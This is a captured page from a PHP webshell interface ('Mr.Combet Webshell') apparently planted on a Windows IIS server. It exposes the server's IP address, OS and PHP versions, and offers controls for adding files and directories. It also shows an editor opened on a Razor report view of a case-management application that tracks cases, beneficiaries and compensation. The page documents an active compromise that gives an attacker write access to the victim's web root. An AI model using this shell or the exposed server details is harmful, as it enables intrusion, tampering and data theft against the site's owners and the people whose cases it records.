Mr.Combet Webshell
Your IP :
216.73.216.136
Server IP :
103.233.58.157
Server :
Windows NT WIN-4PGF72KEHKB 10.0 build 17763 (Windows Server 2016) AMD64
Server Software :
Microsoft-IIS/10.0
PHP Version :
7.3.25
Add File :
Submit
Add Directory :
Submit
Dir :
C:
/
inetpub
/
wwwroot
/
mapqa
/
Views
/
Mrcmid
/
Edit File Name :
_MrcReportPartialView.cshtml
@model RER_Project.DataAccess.ViewModels.MRC_MID.MrcMidReportViewModel <h3><u>Case Status</u></h3> <div class="row"> <div class="col-lg-4"> <table class="table table-bordered"> <thead> <tr> <th>SN</th> <th>Case Type</th> <th>Initial</th> <th style="white-space:nowrap;">On Process</th> <th>Solved</th> <th>Dropped Out</th> <th>Solved and Closed</th> <th>Dropped and Closed</th> <th>Total</th> </tr> </thead> <tbody> @if (Model.FnReportExcelCaseStatus != null) { foreach (var item in Model.FnReportExcelCaseStatus) { <tr> <td>@item.sn</td> <td>@item.case_type</td> <td>@item.initial</td> <td>@item.onprocess</td> <td>@item.solved</td> <td>@item.droppedout</td> <td>@item.solvedandclosed</td> <td>@item.droppedandclosed</td> <td>@(item.initial + item.onprocess +item.droppedout + item.droppedandclosed + item.solvedandclosed+item.solved)</td> </tr> } } </tbody> </table> </div> </div> <h3><u>CountryWise Case And Beneficiary</u></h3> <div class="row"> <div class="col-lg-4"> <table class="table table-bordered"> <thead> <tr> <th>SN</th> <th>Country </th> <th>Total Case </th> <th>Male</th> <th>Female</th> <th style="white-space:nowrap;">Total Beneficiary</th> </tr> </thead> <tbody> @if (Model.FnReportExcelCountryWiseCaseAndBeneficiary != null) { foreach (var item in Model.FnReportExcelCountryWiseCaseAndBeneficiary) { <tr> <td>@item.sn</td> <td>@item.country_name</td> <td>@item.total_case</td> <td>@item.male</td> <td>@item.female</td> <td>@item.gender_total</td> </tr> } } </tbody> </table> </div> </div> <h3><u>Recieved Compensation</u></h3> <div class="row"> <div class="col-lg-4"> <table class="table table-bordered"> <thead> <tr> <th>SN</th> <th>Description</th> <th>Amount (Rs) </th> </tr> </thead> <tbody> @if (Model.FnReportExcelReceivedCompensationInCases != null) { foreach (var item in Model.FnReportExcelReceivedCompensationInCases) { <tr> <td>@item.sn</td> <td>@item.description</td> <td> <strong> @String.Format(System.Globalization.CultureInfo.CreateSpecificCulture("hi-IN"), "{0:#,0.00}", Convert.ToDouble(item.amount)) </strong> </td> </tr> } } </tbody> </table> </div> </div> <h3><u>Case Referal : Source of Case Recieved</u></h3> <div class="row"> <div class="col-lg-4"> <table class="table table-bordered"> <thead> <tr> <th>SN</th> <th>Source Of Case Received</th> <th>Number of Case</th> </tr> </thead> <tbody> @if (Model.FnReportCaseReferalFrom != null) { foreach (var item in Model.FnReportCaseReferalFrom) { <tr> <td>@item.sn</td> <td>@item.description</td> <td> @item.total </td> </tr> } } </tbody> </table> </div> </div> <h3><u>Case Referal : Refer To Report</u></h3> <div class="row"> <div class="col-lg-4"> <table class="table table-bordered"> <thead> <tr> <th>SN</th> <th>Refered To</th> <th>Number of Case</th> </tr> </thead> <tbody> @if (Model.FnReportCaseReferalTo != null) { foreach (var item in Model.FnReportCaseReferalTo) { <tr> <td>@item.sn</td> <td>@item.description</td> <td> @item.total </td> </tr> } } </tbody> </table> </div> </div>
Save